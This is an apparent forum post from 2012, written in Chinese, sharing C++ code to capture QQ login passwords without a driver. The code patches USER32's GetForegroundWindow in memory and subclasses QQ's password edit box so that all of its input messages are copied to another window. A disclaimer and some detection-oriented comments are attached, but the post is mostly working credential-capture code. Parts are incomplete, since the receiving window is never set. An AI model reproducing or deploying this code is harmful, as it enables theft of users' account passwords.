[旧帖]
[原创]不加载驱动截取QQ密码
发表于:
2012-11-6 19:27
[旧帖] [原创]不加载驱动截取QQ密码
直接看代码吧。
菜鸟不怎么会说话。
希望版主给我一个邀请码。
另外，切勿用于非法行为；如有违者，与本人无关。
[HIDE]
/*
 * Original author's note (translated): patch GetForegroundWindow so that the QQ process
 * cannot learn that it has become the foreground window and therefore stops sending its
 * interfering input; the password window's window procedure is replaced as well so that
 * its messages can be monitored.
 *
 * CalePatchAddr: overwrites the first 5 bytes of USER32!GetForegroundWindow, in the
 * process this code runs in, with a relative jmp to a freshly allocated 5-byte stub
 * whose first instruction is ret. Always returns TRUE; no API result is checked.
 *
 * Defender notes: the artifacts this leaves in the process are
 *   (1) a private PAGE_EXECUTE_READWRITE allocation holding the stub,
 *   (2) the USER32 code page switched to PAGE_EXECUTE_READWRITE (the previous
 *       protection saved in oData is never restored), and
 *   (3) an export prologue that starts with 0xE9 and no longer matches the on-disk
 *       image of USER32.DLL.
 * Comparing in-memory export prologues of system DLLs with their file images, and
 * flagging executable+writable private memory, are the checks that surface this.
 */
BOOL CalePatchAddr()
{
// Resolve the export in the copy of USER32.DLL already loaded into this process.
FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
// Stub body: ret followed by nop padding.
byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};
// Stub lives in newly committed read/write/execute memory.
LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(CodeAddr, HookCode, 5);
ULONG oData;
// Make the function's first 5 bytes writable; oData receives the old protection and is not used again.
VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
// rel32 displacement for the jmp: target minus the address of the instruction after the 5-byte jmp.
DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;
memcpy(&NewCode[1], &off, 4);
// Overwrite the function prologue in place.
memcpy(FuncAddr, NewCode, 5);
return TRUE;
}
// Window procedure that was installed on the targeted Edit control before InstallHook
// replaced it; WndProc2 chains to it.
WNDPROC pswd_proc = NULL;
// Window that WndProc2 copies every message to. It is not assigned anywhere in this listing.
HWND recv_hwnd = NULL;
// Replacement window procedure installed by InstallHook on the password Edit control.
// Every message delivered to the control is first duplicated to recv_hwnd with
// SendMessage, then handed unchanged to the saved original procedure, whose result is
// returned.
// Defender note: because all messages are forwarded, the copy includes the control's
// keyboard input. A window procedure for a control that does not point into the module
// owning that control's window class is the observable indicator of this subclassing.
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
// Duplicate the message to the receiving window (synchronous call).
SendMessage((HWND)recv_hwnd, message, wParam, lParam);
// Chain to the original procedure so the control keeps behaving normally.
return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
// Locates the QQ login window and subclasses its password Edit control.
// Steps visible in the code: find the top-level window with class "TXGuiFoundation" and
// title "QQ2012"; take its first child of class "Edit"; save that control's current
// window procedure in pswd_proc; install WndProc2 in its place via
// SetWindowLong(GWL_WNDPROC). Shows a message box and returns early if either window
// is not found.
// Defender note: the change is a GWL_WNDPROC replacement on a window belonging to
// another component; auditing the window procedure of sensitive input controls, and
// monitoring for SetWindowLong(GWL_WNDPROC) against them, detects it.
void InstallHook()
{
HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
if (QQ_hwnd == NULL)
{
AfxMessageBox(_T("QQ not found!"));
return;
}
HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0); // first child window of class "Edit"
if (pswd_hwnd == NULL)
{
AfxMessageBox(_T("pswd HWND not found!"));
return;
}
// Remember the control's existing procedure so WndProc2 can chain to it.
pswd_proc = reinterpret_cast<WNDPROC>(GetWindowLong(pswd_hwnd, GWL_WNDPROC));
// Install the forwarding procedure; the value stored in ret is not used afterwards.
long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}、
[/HIDE]